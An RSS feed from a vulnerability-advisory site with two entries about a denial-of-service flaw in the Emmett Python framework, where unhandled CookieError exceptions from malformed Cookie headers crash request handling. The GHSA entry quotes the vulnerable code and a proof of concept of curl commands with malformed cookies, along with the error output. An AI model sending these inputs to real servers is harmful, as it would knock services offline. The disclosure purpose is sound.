<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 06:18:41 +0000</lastBuildDate>
    <item>
      <title>CVE-2026-25577 — Emmett has an Unhandled CookieError Exception Causing Denial of Service</title>
      <link>https://cve.radiocsirt.org/vuln/cve-2026-25577</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; emmett-framework core&lt;/p&gt;
&lt;p&gt;Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticated attackers to trigger HTTP 500 errors and cause denial of service. This vulnerability is fixed in 1.3.11.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; emmett-framework core&lt;/p&gt;
&lt;p&gt;Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticated attackers to trigger HTTP 500 errors and cause denial of service. This vulnerability is fixed in 1.3.11.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cve-2026-25577</guid>
    </item>
    <item>
      <title>GHSA-x6cr-mq53-cc76 — Emmett-Core: Unhandled CookieError Exception Causing Denial of Service</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-x6cr-mq53-cc76</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: emmett-core&lt;/p&gt;
&lt;p&gt;### Summary
The `cookies` property in `emmett_core.http.wrappers.Request` does not handle 
`CookieError` exceptions when parsing malformed Cookie headers. This allows 
unauthenticated attackers to trigger HTTP 500 errors and cause denial of service.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;**Location:** `emmett_core/http/wrappers/__init__.py` (line 64)&lt;/p&gt;
&lt;p&gt;**Vulnerable Code:**
```python
@cachedprop
def cookies(self) -&amp;gt; SimpleCookie:
    cookies: SimpleCookie = SimpleCookie()
    for cookie in self.headers.get(&amp;#34;cookie&amp;#34;, &amp;#34;&amp;#34;).split(&amp;#34;;&amp;#34;):
        cookies.load(cookie)  # No exception handling
    return cookies
```&lt;/p&gt;
&lt;p&gt;### PoC
Sending cookies containing special characters such as /(){} will result in insufficient error handling and a server error.
```bash
$ curl -w &amp;#34;\nTime: %{time_total}s\n&amp;#34; http://localhost:8000/ -H &amp;#34;Cookie:/security=test&amp;#34;
Internal error
Time: 0.024363s
```
After the same error occurs several times, the server cannot process it normally.
```bash
$ curl -w &amp;#34;\nTime: %{time_total}s\n&amp;#34; http://localhost:8000/ -H &amp;#34;Cookie:(security=test&amp;#34;
Internal error
Time: 60.069334s&lt;/p&gt;
&lt;p&gt;$ curl -w &amp;#34;\nTime: %{time_total}s\n&amp;#34; http://localhost:8000/ -H &amp;#34;Cookie:security=test&amp;#34;
Internal error
Time: 60.074031s
```&lt;/p&gt;
&lt;p&gt;This is server log.
```bash
[2026-02-03 08:23:40,541] ERROR in handlers: Application exception:
Traceback (most recent call last):
  File &amp;#34;/home/geonwoo/.local/lib/python3.13/site-packages/emmett/rsgi/handlers.py&amp;#34;, line 70, in dynamic_handler
    http = await self.router.dispatch(request, response)
           ^^^^…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: emmett-core&lt;/p&gt;
&lt;p&gt;### Summary
The `cookies` property in `emmett_core.http.wrappers.Request` does not handle 
`CookieError` exceptions when parsing malformed Cookie headers. This allows 
unauthenticated attackers to trigger HTTP 500 errors and cause denial of service.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;**Location:** `emmett_core/http/wrappers/__init__.py` (line 64)&lt;/p&gt;
&lt;p&gt;**Vulnerable Code:**
```python
@cachedprop
def cookies(self) -&amp;gt; SimpleCookie:
    cookies: SimpleCookie = SimpleCookie()
    for cookie in self.headers.get(&amp;#34;cookie&amp;#34;, &amp;#34;&amp;#34;).split(&amp;#34;;&amp;#34;):
        cookies.load(cookie)  # No exception handling
    return cookies
```&lt;/p&gt;
&lt;p&gt;### PoC
Sending cookies containing special characters such as /(){} will result in insufficient error handling and a server error.
```bash
$ curl -w &amp;#34;\nTime: %{time_total}s\n&amp;#34; http://localhost:8000/ -H &amp;#34;Cookie:/security=test&amp;#34;
Internal error
Time: 0.024363s
```
After the same error occurs several times, the server cannot process it normally.
```bash
$ curl -w &amp;#34;\nTime: %{time_total}s\n&amp;#34; http://localhost:8000/ -H &amp;#34;Cookie:(security=test&amp;#34;
Internal error
Time: 60.069334s&lt;/p&gt;
&lt;p&gt;$ curl -w &amp;#34;\nTime: %{time_total}s\n&amp;#34; http://localhost:8000/ -H &amp;#34;Cookie:security=test&amp;#34;
Internal error
Time: 60.074031s
```&lt;/p&gt;
&lt;p&gt;This is server log.
```bash
[2026-02-03 08:23:40,541] ERROR in handlers: Application exception:
Traceback (most recent call last):
  File &amp;#34;/home/geonwoo/.local/lib/python3.13/site-packages/emmett/rsgi/handlers.py&amp;#34;, line 70, in dynamic_handler
    http = await self.router.dispatch(request, response)
           ^^^^…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-x6cr-mq53-cc76</guid>
    </item>
  </channel>
</rss>
